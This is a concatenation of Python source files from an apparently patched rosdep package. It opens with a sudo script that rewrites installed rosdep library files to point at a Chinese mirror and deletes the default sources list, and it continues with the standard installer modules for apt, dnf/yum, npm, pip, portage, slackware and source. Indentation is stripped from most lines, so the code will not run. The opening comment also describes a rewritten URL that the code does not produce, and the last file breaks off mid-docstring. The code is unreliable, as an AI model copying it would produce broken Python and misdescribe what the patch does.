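# script). A URL such as
#     https://raw.githubusercontent.com/ros/rosdistro/master/rosdep/sources.list.d/20-default.list
# becomes
#     https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/master/rosdep/sources.list.d/20-default.list
# because the replacement keeps the original "https://" prefix intact.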
def fix_uri2( file ):
    print('Opening file: ' + file)
try:
src_file = open(file, 'r')
except IOError:
        print('\n[!] Patching failed... please make sure the command was run with sudo.\n---------------------\nCorrect commands:\nsudo pip install 6-rosdep\nsudo 6-rosdep\n---------------------\n')
return False
else:
if src_file:
            print('Switching rosdep to a mirror hosted in China...')
contents = src_file.read()
            # back up the original contents
backup_exists = os.path.exists(file + '.bak')
if backup_exists is False:
backup_file = open(file + '.bak', 'w')
backup_file.write(contents)
backup_file.close()
            # replace the contents
src_file.close()
src_file = open(file, 'w')
#new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","gitee.com/fuckrosdep/rosdistro/raw")
new_contents = contents.replace("raw.githubusercontent.com/ros/rosdistro","https://mirrors.tuna.tsinghua.edu.cn/rosdistro")
new_contents2 = new_contents.replace("gitee.com/fuckrosdep/rosdistro/raw","https://mirrors.tuna.tsinghua.edu.cn/rosdistro")
#print(new_contents)
src_file.write(new_contents2)
src_file.close()
return True
def main(args=None):
print("--------------------------------------------------------------------------------")
print("感谢赵虚左老师提供的解题思路。感谢鱼香ROS大佬的引导启发。\n愿天下道友再无 rosdep 之烦恼~\n欢迎加QQ群【869643967】")
print("--------------------------------------------------------------------------------")
file_1 = '/usr/lib/python2.7/dist-packages/rosdistro/__init__.py'
file_2 = '/usr/lib/python2.7/dist-packages/rosdep2/gbpdistro_support.py'
file_3 = '/usr/lib/python2.7/dist-packages/rosdep2/rep3.py'
file_4 = '/usr/lib/python2.7/dist-packages/rosdep2/sources_list.py'
file_5 = '/usr/lib/python3/dist-packages/rosdistro/__init__.py'
file_6 = '/usr/lib/python3/dist-packages/rosdep2/gbpdistro_support.py'
file_7 = '/usr/lib/python3/dist-packages/rosdep2/rep3.py'
file_8 = '/usr/lib/python3/dist-packages/rosdep2/sources_list.py'
#melodic / Ubuntu 18.04
try:
file_1_exists = os.path.exists(file_1)
finally:
if file_1_exists:
            print('\nDetected Melodic or an earlier release (Ubuntu 18.04 or older), starting to patch...\n')
res = fix_uri2(file_1)
if res is False:
sys.exit(1)
res = fix_uri(file_2)
if res is False:
sys.exit(1)
res = fix_uri(file_3)
if res is False:
sys.exit(1)
res = fix_uri(file_4)
if res is False:
sys.exit(1)
#noetic / Ubuntu 20.04
try:
file_5_exists = os.path.exists(file_5)
finally:
if file_5_exists:
            print('Detected Noetic (Ubuntu 20.04), starting to patch...\n')
res = fix_uri2(file_5)
if res is False:
sys.exit(1)
res = fix_uri(file_6)
if res is False:
sys.exit(1)
res = fix_uri(file_7)
if res is False:
sys.exit(1)
res = fix_uri(file_8)
#complete
file_list = "/etc/ros/rosdep/sources.list.d/20-default.list"
file_list_exists = os.path.exists(file_list)
if file_list_exists:
        print('Removing old file: ' + file_list + '\n\n')
os.remove(file_list)
print("--------------------------------------------------------------------------------")
    print('\nIf you run into any problem, please report it via the WeChat official account [六部工坊]; we will help you as soon as possible.\nFor more ROS tutorial videos, please follow the Bilibili channel [六部工坊].\n')
print("--------------------------------------------------------------------------------")
    print('Patching finished~ You can now run the following commands:\n \nsudo rosdep init \nrosdep update \n')
from __future__ import print_function
import os
import subprocess
from ..core import InstallFailed
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# npm package manager key
NPM_INSTALLER = 'npm'
def register_installers(context):
context.set_installer(NPM_INSTALLER, NpmInstaller())
def is_npm_installed():
try:
subprocess.Popen(['npm'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
class NpmInstaller(PackageManagerInstaller):
"""
:class:`Installer` support for npm.
"""
def __init__(self):
super(NpmInstaller, self).__init__(self.npm_detect, supports_depends=True)
def npm_detect(self, pkgs, exec_fn=None):
"""
        Given a list of packages, return the list of installed packages.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
if exec_fn is None:
exec_fn = read_stdout
# npm list -parseable returns [dir, dir/node_modules/path, dir/node_modules/path, ...]
if self.as_root:
cmd = ['npm', 'list', '-g']
else:
cmd = ['npm', 'list']
pkg_list = exec_fn(cmd + ['-parseable']).split('\n')
ret_list = []
for pkg in pkg_list[1:]:
pkg_row = pkg.split('/')
if pkg_row[-1] in pkgs:
ret_list.append(pkg_row[-1])
return ret_list
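    # Illustrative sketch (not part of the original class) of the parsing above,
    # assuming 'npm list -parseable' printed something like:
    #
    #     /home/user/project
    #     /home/user/project/node_modules/foo
    #     /home/user/project/node_modules/bar
    #
    # npm_detect(['foo', 'baz']) would then return ['foo'].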
def get_version_strings(self):
npm_version = subprocess.check_output(['npm', '--version']).strip().decode()
return ['npm {}'.format(npm_version)]
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
if not is_npm_installed():
raise InstallFailed((NPM_INSTALLER, 'npm is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
if self.as_root:
cmd = ['npm', 'install', '-g']
else:
cmd = ['npm', 'install']
return [self.elevate_priv(cmd + [p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/npm.py | npm.py |
# Author Tully Foote, Ken Conley
from __future__ import print_function
import subprocess
import sys
from rospkg.os_detect import (
OS_DEBIAN,
OS_LINARO,
OS_UBUNTU,
OS_ELEMENTARY,
OS_MX,
OS_POP,
OS_ZORIN,
OsDetect,
read_os_release
)
from .pip import PIP_INSTALLER
from .gem import GEM_INSTALLER
from .npm import NPM_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# apt package manager key
APT_INSTALLER = 'apt'
def register_installers(context):
context.set_installer(APT_INSTALLER, AptInstaller())
def register_platforms(context):
register_debian(context)
register_ubuntu(context)
# Aliases
register_elementary(context)
register_linaro(context)
register_mx(context)
register_pop(context)
register_zorin(context)
def register_debian(context):
context.add_os_installer_key(OS_DEBIAN, APT_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, PIP_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, GEM_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, NPM_INSTALLER)
context.add_os_installer_key(OS_DEBIAN, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_DEBIAN, lambda self: APT_INSTALLER)
context.set_os_version_type(OS_DEBIAN, OsDetect.get_codename)
def register_linaro(context):
# Linaro is an alias for Ubuntu. If linaro is detected and it's not set as
# an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_LINARO and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_LINARO, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_elementary(context):
# Elementary is an alias for Ubuntu. If elementary is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_ELEMENTARY and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_ELEMENTARY, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_mx(context):
# MX is an alias for Debian. If MX is detected and it's
# not set as an override, force Debian.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_MX and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_MX, OS_DEBIAN), file=sys.stderr)
release_info = read_os_release()
version = read_os_release()["VERSION"]
context.set_os_override(OS_DEBIAN, version[version.find("(") + 1:version.find(")")])
def register_pop(context):
# Pop! OS is an alias for Ubuntu. If Pop! is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_POP and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_POP, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_zorin(context):
# Zorin is an alias for Ubuntu. If Zorin is detected and it's
# not set as an override force ubuntu.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == OS_ZORIN and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(OS_ZORIN, OS_UBUNTU), file=sys.stderr)
context.set_os_override(OS_UBUNTU, context.os_detect.get_codename())
def register_ubuntu(context):
context.add_os_installer_key(OS_UBUNTU, APT_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, PIP_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, GEM_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, NPM_INSTALLER)
context.add_os_installer_key(OS_UBUNTU, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_UBUNTU, lambda self: APT_INSTALLER)
context.set_os_version_type(OS_UBUNTU, OsDetect.get_codename)
def _read_apt_cache_showpkg(packages, exec_fn=None):
"""
    For each package, yield whether it is a virtual package and, if so, the
    list of packages providing it.
    If a package was not found, it is yielded as non-virtual.
:param exec_fn: see `dpkg_detect`; make sure that exec_fn supports a
second, boolean, parameter.
"""
cmd = ['apt-cache', 'showpkg'] + packages
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(cmd).splitlines()
starts = []
notfound = set()
for p in packages:
last_start = starts[-1] if len(starts) > 0 else 0
try:
starts.append(std_out.index('Package: %s' % p, last_start))
except ValueError:
notfound.add(p)
starts.append(None)
for p in packages:
if p in notfound:
yield p, False, None
continue
start = starts.pop(0)
lines = iter(std_out[start:starts[0]])
header = 'Package: %s' % p
# proceed to Package header
try:
while next(lines) != header:
pass
except StopIteration:
pass
# proceed to versions section
try:
while next(lines) != 'Versions: ':
pass
except StopIteration:
pass
# virtual packages don't have versions
try:
if next(lines) != '':
yield p, False, None
continue
except StopIteration:
break
        # proceed to the Reverse Provides section
try:
while next(lines) != 'Reverse Provides: ':
pass
except StopIteration:
pass
pr = [line.split(' ', 2)[0] for line in lines]
if pr:
yield p, True, pr
else:
yield p, False, None
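# Illustrative sketch (not part of the original module) of the tuples yielded
# above; 'ros-core-deps' and 'some-provider' are placeholder names for a
# virtual package and its provider:
#
#     list(_read_apt_cache_showpkg(['curl', 'ros-core-deps', 'no-such-pkg']))
#     # -> [('curl', False, None),
#     #     ('ros-core-deps', True, ['some-provider']),
#     #     ('no-such-pkg', False, None)]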
def dpkg_detect(pkgs, exec_fn=None):
"""
    Given a list of packages, return the list of installed packages.
:param pkgs: list of package names, optionally followed by a fixed version (`foo=3.0`)
:param exec_fn: function to execute Popen and read stdout (for testing)
:return: list elements in *pkgs* that were found installed on the system
"""
ret_list = []
# this is mainly a hack to support version locking for eigen.
# we strip version-locking syntax, e.g. libeigen3-dev=3.0.1-*.
# our query does not do the validation on the version itself.
# This is a map `package name -> package name optionally with version`.
version_lock_map = {}
for p in pkgs:
if '=' in p:
version_lock_map[p.split('=')[0]] = p
else:
version_lock_map[p] = p
cmd = ['dpkg-query', '-W', '-f=\'${Package} ${Status}\n\'']
cmd.extend(version_lock_map.keys())
if exec_fn is None:
exec_fn = read_stdout
std_out, std_err = exec_fn(cmd, True)
std_out = std_out.replace('\'', '')
pkg_list = std_out.split('\n')
for pkg in pkg_list:
pkg_row = pkg.split()
if len(pkg_row) == 4 and (pkg_row[3] == 'installed'):
ret_list.append(pkg_row[0])
installed_packages = [version_lock_map[r] for r in ret_list]
# now for the remaining packages check, whether they are installed as
# virtual packages
remaining = _read_apt_cache_showpkg(list(p for p in pkgs if p not in installed_packages))
virtual = [n for (n, v, pr) in remaining if v and len(dpkg_detect(pr)) > 0]
return installed_packages + virtual
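# Illustrative usage sketch (not part of the original module); the version
# suffix is stripped for the query but preserved in the result:
#
#     dpkg_detect(['libeigen3-dev=3.0.1-*', 'libboost-dev'])
#     # -> ['libeigen3-dev=3.0.1-*', 'libboost-dev'] if both are installed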
def _iterate_packages(packages, reinstall):
for entry in _read_apt_cache_showpkg(packages):
p, is_virtual, providers = entry
if is_virtual:
installed = []
if reinstall:
installed = dpkg_detect(providers)
if len(installed) > 0:
for i in installed:
yield i
                    continue  # don't output providers
yield providers
else:
yield p
class AptInstaller(PackageManagerInstaller):
"""
An implementation of the Installer for use on debian style
systems.
"""
def __init__(self):
super(AptInstaller, self).__init__(dpkg_detect)
def get_version_strings(self):
output = subprocess.check_output(['apt-get', '--version'])
version = output.splitlines()[0].split(b' ')[1].decode()
return ['apt-get {}'.format(version)]
def _get_install_commands_for_package(self, base_cmd, package_or_list):
def pkg_command(p):
return self.elevate_priv(base_cmd + [p])
if isinstance(package_or_list, list):
return [pkg_command(p) for p in package_or_list]
else:
return pkg_command(package_or_list)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
base_cmd = ['apt-get', 'install']
if not interactive:
base_cmd.append('-y')
if quiet:
base_cmd.append('-qq')
return [self._get_install_commands_for_package(base_cmd, p) for p in _iterate_packages(packages, reinstall)] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/debian.py | debian.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import subprocess
import sys
from rospkg.os_detect import (
OS_ALMALINUX,
OS_CENTOS,
OS_FEDORA,
OS_ORACLE,
OS_RHEL,
OS_ROCKY
)
from .pip import PIP_INSTALLER
from .source import SOURCE_INSTALLER
from ..core import rd_debug
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# dnf package manager key
DNF_INSTALLER = 'dnf'
# yum package manager key
YUM_INSTALLER = 'yum'
def register_installers(context):
context.set_installer(DNF_INSTALLER, DnfInstaller())
context.set_installer(YUM_INSTALLER, YumInstaller())
def register_platforms(context):
register_fedora(context)
register_rhel(context)
# Aliases
register_rhel_clone(context, OS_ALMALINUX)
register_rhel_clone(context, OS_CENTOS)
register_rhel_clone(context, OS_ORACLE)
register_rhel_clone(context, OS_ROCKY)
def register_fedora(context):
context.add_os_installer_key(OS_FEDORA, PIP_INSTALLER)
context.add_os_installer_key(OS_FEDORA, DNF_INSTALLER)
context.add_os_installer_key(OS_FEDORA, YUM_INSTALLER)
context.add_os_installer_key(OS_FEDORA, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_FEDORA, lambda self: DNF_INSTALLER if self.get_version().isdigit() and int(self.get_version()) > 21 else YUM_INSTALLER)
context.set_os_version_type(OS_FEDORA, lambda self: self.get_version() if self.get_version().isdigit() and int(self.get_version()) > 20 else self.get_codename())
def register_rhel(context):
context.add_os_installer_key(OS_RHEL, PIP_INSTALLER)
context.add_os_installer_key(OS_RHEL, DNF_INSTALLER)
context.add_os_installer_key(OS_RHEL, YUM_INSTALLER)
context.add_os_installer_key(OS_RHEL, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_RHEL, lambda self: DNF_INSTALLER if self.get_version().split('.', 1)[0].isdigit() and int(self.get_version().split('.', 1)[0]) >= 8 else YUM_INSTALLER)
context.set_os_version_type(OS_RHEL, lambda self: self.get_version().split('.', 1)[0])
def register_rhel_clone(context, os_rhel_clone_name):
# Some distributions are rebuilds of RHEL and can be treated like RHEL
# because they are versioned the same and contain the same packages.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == os_rhel_clone_name and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(os_rhel_clone_name, OS_RHEL), file=sys.stderr)
context.set_os_override(OS_RHEL, os_version.split('.', 1)[0])
def rpm_detect_py(packages):
ret_list = []
import rpm
ts = rpm.TransactionSet()
for raw_req in packages:
req = rpm_expand_py(raw_req)
rpms = ts.dbMatch(rpm.RPMTAG_PROVIDES, req)
if len(rpms) > 0:
ret_list += [raw_req]
return ret_list
def rpm_detect_cmd(raw_packages, exec_fn=None):
ret_list = []
if exec_fn is None:
exec_fn = read_stdout
packages = [rpm_expand_cmd(package, exec_fn) for package in raw_packages]
cmd = ['rpm', '-q', '--whatprovides', '--qf', '[%{PROVIDES}\n]']
cmd.extend(packages)
std_out = exec_fn(cmd)
out_lines = std_out.split('\n')
for index, package in enumerate(packages):
if package in out_lines:
ret_list.append(raw_packages[index])
return ret_list
def rpm_detect(packages, exec_fn=None):
try:
return rpm_detect_py(packages)
except ImportError:
rd_debug('Failed to import rpm module, falling back to slow method')
return rpm_detect_cmd(packages, exec_fn)
def rpm_expand_py(macro):
import rpm
if '%' not in macro:
return macro
expanded = rpm.expandMacro(macro)
rd_debug('Expanded rpm macro in \'%s\' to \'%s\'' % (macro, expanded))
return expanded
def rpm_expand_cmd(macro, exec_fn=None):
if '%' not in macro:
return macro
cmd = ['rpm', '-E', macro]
if exec_fn is None:
exec_fn = read_stdout
expanded = exec_fn(cmd).strip()
rd_debug('Expanded rpm macro in \'%s\' to \'%s\'' % (macro, expanded))
return expanded
def rpm_expand(package, exec_fn=None):
try:
return rpm_expand_py(package)
except ImportError:
return rpm_expand_cmd(package, exec_fn)
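# Illustrative sketch (not part of the original module): rosdep keys may
# contain rpm macros, which are expanded before querying, e.g.
#
#     rpm_expand('%{_datadir}/foo')  # -> '/usr/share/foo' on typical systems
#     rpm_expand('cmake')            # returned unchanged, no '%' present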
def get_rpm_version_py():
from rpm import __version__ as rpm_version
return rpm_version
def get_rpm_version_cmd():
output = subprocess.check_output(['rpm', '--version'])
version = output.splitlines()[0].split(b' ')[-1].decode()
return version
def get_rpm_version():
try:
return get_rpm_version_py()
except ImportError:
return get_rpm_version_cmd()
class DnfInstaller(PackageManagerInstaller):
"""
    This class provides the functions for installing using dnf.
    Its methods partially implement the Rosdep OS API to complement
    the roslib.OSDetect API.
"""
def __init__(self):
super(DnfInstaller, self).__init__(rpm_detect)
def get_version_strings(self):
dnf_output = subprocess.check_output(['dnf', '--version'])
dnf_version = dnf_output.splitlines()[0].decode()
version_strings = [
'dnf {}'.format(dnf_version),
'rpm {}'.format(get_rpm_version()),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raw_packages = self.get_packages_to_install(resolved, reinstall=reinstall)
packages = [rpm_expand(package) for package in raw_packages]
if not packages:
return []
elif not interactive and quiet:
return [self.elevate_priv(['dnf', '--assumeyes', '--quiet', '--setopt=strict=0', 'install']) + packages]
elif quiet:
return [self.elevate_priv(['dnf', '--quiet', '--setopt=strict=0', 'install']) + packages]
elif not interactive:
return [self.elevate_priv(['dnf', '--assumeyes', '--setopt=strict=0', 'install']) + packages]
else:
return [self.elevate_priv(['dnf', '--setopt=strict=0', 'install']) + packages]
class YumInstaller(PackageManagerInstaller):
"""
    This class provides the functions for installing using yum.
    Its methods partially implement the Rosdep OS API to complement
    the roslib.OSDetect API.
"""
def __init__(self):
super(YumInstaller, self).__init__(rpm_detect)
def get_version_strings(self):
yum_output = subprocess.check_output(['yum', '--version'])
yum_version = yum_output.splitlines()[0].decode()
version_strings = [
'yum {}'.format(yum_version),
'rpm {}'.format(get_rpm_version()),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raw_packages = self.get_packages_to_install(resolved, reinstall=reinstall)
packages = [rpm_expand(package) for package in raw_packages]
if not packages:
return []
elif not interactive and quiet:
return [self.elevate_priv(['yum', '--assumeyes', '--quiet', '--skip-broken', 'install']) + packages]
elif quiet:
return [self.elevate_priv(['yum', '--quiet', '--skip-broken', 'install']) + packages]
elif not interactive:
return [self.elevate_priv(['yum', '--assumeyes', '--skip-broken', 'install']) + packages]
else:
return [self.elevate_priv(['yum', '--skip-broken', 'install']) + packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/redhat.py | redhat.py |
# A word on atoms
# We'll be using 'atoms' instead of 'packages' for the majority of the gentoo installer.
# Atoms can specify a package version (either exactly, or min/max version), flags it has
# to be built with, and even repositories it has to come from
#
# Here are some valid atoms and their meanings:
# sed // A package named 'sed'
# sys-apps/sed // sed from the category 'sys-apps'. There can be collisions otherwise.
# sys-apps/sed::gentoo // sed from the category 'sys-apps' and the repository 'gentoo' (the default).
# >=sys-apps/sed-4 // sed of at least version 4
# sed[static,-nls] // sed built with the static USE flag and without the nls one
import os
from rospkg.os_detect import OS_GENTOO
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
PORTAGE_INSTALLER = 'portage'
def register_installers(context):
context.set_installer(PORTAGE_INSTALLER, PortageInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_GENTOO, PORTAGE_INSTALLER)
context.add_os_installer_key(OS_GENTOO, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_GENTOO, lambda self: PORTAGE_INSTALLER)
# Determine whether an atom is already satisfied
def portage_detect_single(atom, exec_fn=read_stdout):
"""
Check if a given atom is installed.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
std_out = exec_fn(['portageq', 'match', '/', atom])
    # TODO: consider checking the name of the package returned
    # TODO: figure out whether returning True when two packages are returned is acceptable
return len(std_out) >= 1
def portage_detect(atoms, exec_fn=read_stdout):
"""
Given a list of atoms, return a list of which are already installed.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
# This is for testing, to make sure they're always checked in the same order
# TODO: make testing better to not need this
if isinstance(atoms, list):
atoms.sort()
return [a for a in atoms if portage_detect_single(a, exec_fn)]
# Check portage and needed tools for existence and compatibility
def portage_available():
if not os.path.exists('/usr/bin/portageq'):
return False
if not os.path.exists('/usr/bin/emerge'):
return False
# We only use standard, defined portage features.
# They work in all released versions of portage, and should work in
    # future versions for a long time to come.
# but .. TODO: Check versions
return True
class PortageInstaller(PackageManagerInstaller):
def __init__(self):
super(PortageInstaller, self).__init__(portage_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
atoms = self.get_packages_to_install(resolved, reinstall=reinstall)
cmd = self.elevate_priv(['emerge'])
if not atoms:
return []
if interactive:
cmd.append('-a')
cmd.extend(atoms)
return [cmd] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/gentoo.py | gentoo.py |
# Author Nikolay Nikolov/[email protected]
import subprocess
import os
from ..core import InstallFailed
from .pip import PIP_INSTALLER
from ..installers import PackageManagerInstaller
from .source import SOURCE_INSTALLER
from ..shell_utils import read_stdout
SLACKWARE_OS_NAME = 'slackware'
SBOTOOLS_INSTALLER = 'sbotools'
SLACKPKG_INSTALLER = 'slackpkg'
def register_installers(context):
context.set_installer(SBOTOOLS_INSTALLER, SbotoolsInstaller())
context.set_installer(SLACKPKG_INSTALLER, SlackpkgInstaller())
def register_platforms(context):
context.add_os_installer_key(SLACKWARE_OS_NAME, SBOTOOLS_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, PIP_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, SOURCE_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, SLACKPKG_INSTALLER)
context.set_default_os_installer_key(SLACKWARE_OS_NAME, lambda self: SBOTOOLS_INSTALLER)
def sbotools_available():
if not os.path.exists('/usr/sbin/sboinstall'):
return False
return True
def sbotools_detect_single(p):
pkg_list = read_stdout(['ls', '/var/log/packages'])
p = subprocess.Popen(['grep', '-i', '^' + p], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate(pkg_list)
return not p.returncode
def sbotools_detect(packages):
return [p for p in packages if sbotools_detect_single(p)]
class SbotoolsInstaller(PackageManagerInstaller):
def __init__(self):
super(SbotoolsInstaller, self).__init__(sbotools_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
if not sbotools_available():
raise InstallFailed((SBOTOOLS_INSTALLER, 'sbotools is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
cmd = ['sboinstall']
return [self.elevate_priv(cmd + [p] + ['-j']) for p in packages]
def slackpkg_available():
if not os.path.exists('/usr/sbin/slackpkg'):
return False
return True
def slackpkg_detect_single(p):
return not subprocess.call(['slackpkg', 'search', p], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def slackpkg_detect(packages):
return [p for p in packages if slackpkg_detect_single(p)]
class SlackpkgInstaller(PackageManagerInstaller):
def __init__(self):
super(SlackpkgInstaller, self).__init__(slackpkg_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# slackpkg does not provide non-interactive mode
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
else:
return [self.elevate_priv(['slackpkg', 'install', p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/slackware.py | slackware.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
import pkg_resources
import subprocess
import sys
from ..core import InstallFailed
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# pip package manager key
PIP_INSTALLER = 'pip'
def register_installers(context):
context.set_installer(PIP_INSTALLER, PipInstaller())
def get_pip_command():
# First try pip2 or pip3
cmd = ['pip' + os.environ['ROS_PYTHON_VERSION']]
if is_cmd_available(cmd):
return cmd
# Second, try using the same python executable since we know that exists
if os.environ['ROS_PYTHON_VERSION'] == sys.version[0]:
try:
import pip
except ImportError:
pass
else:
return [sys.executable, '-m', 'pip']
# Finally, try python2 or python3 commands
cmd = ['python' + os.environ['ROS_PYTHON_VERSION'], '-m', 'pip']
if is_cmd_available(cmd):
return cmd
return None
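# Illustrative sketch (not part of the original module) of possible return
# values; it assumes the ROS_PYTHON_VERSION environment variable is set:
#
#     get_pip_command()  # -> ['pip3'], or [sys.executable, '-m', 'pip'],
#                        #    or ['python3', '-m', 'pip'], or None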
def is_cmd_available(cmd):
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
def pip_detect(pkgs, exec_fn=None):
"""
    Given a list of packages, return the list of installed packages.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
pip_cmd = get_pip_command()
if not pip_cmd:
return []
fallback_to_pip_show = False
if exec_fn is None:
exec_fn = read_stdout
fallback_to_pip_show = True
pkg_list = exec_fn(pip_cmd + ['freeze']).split('\n')
ret_list = []
for pkg in pkg_list:
pkg_row = pkg.split('==')
if pkg_row[0] in pkgs:
ret_list.append(pkg_row[0])
# Try to detect with the return code of `pip show`.
    # This can show the existence of things like `argparse` which
# otherwise do not show up.
# See:
# https://github.com/pypa/pip/issues/1570#issuecomment-71111030
if fallback_to_pip_show:
for pkg in [p for p in pkgs if p not in ret_list]:
            # older pip versions do not set a useful return code, so check stdout to decide whether the package is installed
proc = subprocess.Popen(
pip_cmd + ['show', pkg],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
output, _ = proc.communicate()
output = output.strip()
if proc.returncode == 0 and output:
# `pip show` detected it, add it to the list.
ret_list.append(pkg)
return ret_list
class PipInstaller(PackageManagerInstaller):
"""
:class:`Installer` support for pip.
"""
def __init__(self):
super(PipInstaller, self).__init__(pip_detect, supports_depends=True)
def get_version_strings(self):
pip_version = pkg_resources.get_distribution('pip').version
setuptools_version = pkg_resources.get_distribution('setuptools').version
version_strings = [
'pip {}'.format(pip_version),
'setuptools {}'.format(setuptools_version),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
pip_cmd = get_pip_command()
if not pip_cmd:
raise InstallFailed((PIP_INSTALLER, 'pip is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
cmd = pip_cmd + ['install', '-U']
if quiet:
cmd.append('-q')
if reinstall:
cmd.append('-I')
return [self.elevate_priv(cmd + [p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/pip.py | pip.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
try:
from urllib.request import urlopen
from urllib.request import urlretrieve
from urllib.error import URLError
except ImportError:
from urllib2 import urlopen
from urllib import urlretrieve
from urllib2 import URLError
import hashlib
import yaml
from ..core import rd_debug, InvalidData
from ..installers import PackageManagerInstaller, InstallFailed
from ..shell_utils import create_tempfile_from_string_and_execute
SOURCE_INSTALLER = 'source'
def register_installers(context):
context.set_installer(SOURCE_INSTALLER, SourceInstaller())
class InvalidRdmanifest(Exception):
"""
rdmanifest format is invalid.
"""
pass
class DownloadFailed(Exception):
"""
    File download failed either due to I/O issues or md5sum validation failure.
"""
pass
def _sub_fetch_file(url, md5sum=None):
"""
    Sub-routine of fetch_file
:raises: :exc:`DownloadFailed`
"""
contents = ''
try:
fh = urlopen(url)
contents = fh.read()
if md5sum is not None:
filehash = hashlib.md5(contents).hexdigest()
if md5sum and filehash != md5sum:
raise DownloadFailed("md5sum didn't match for %s. Expected %s got %s" % (url, md5sum, filehash))
except URLError as ex:
raise DownloadFailed(str(ex))
return contents
def get_file_hash(filename):
md5 = hashlib.md5()
with open(filename, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
md5.update(chunk)
return md5.hexdigest()
def fetch_file(url, md5sum=None):
"""
Download file. Optionally validate with md5sum
:param url: URL to download
:param md5sum: Expected MD5 sum of contents
"""
error = contents = ''
try:
contents = _sub_fetch_file(url, md5sum)
if not isinstance(contents, str):
contents = contents.decode('utf-8')
except DownloadFailed as e:
rd_debug('Download of file %s failed' % (url))
error = str(e)
return contents, error
def load_rdmanifest(contents):
"""
:raises: :exc:`InvalidRdmanifest`
"""
try:
return yaml.safe_load(contents)
except yaml.scanner.ScannerError as ex:
raise InvalidRdmanifest('Failed to parse yaml in %s: Error: %s' % (contents, ex))
def download_rdmanifest(url, md5sum, alt_url=None):
"""
:param url: URL to download rdmanifest from
:param md5sum: MD5 sum for validating url download, or None
:returns: (contents of rdmanifest, download_url). download_url is
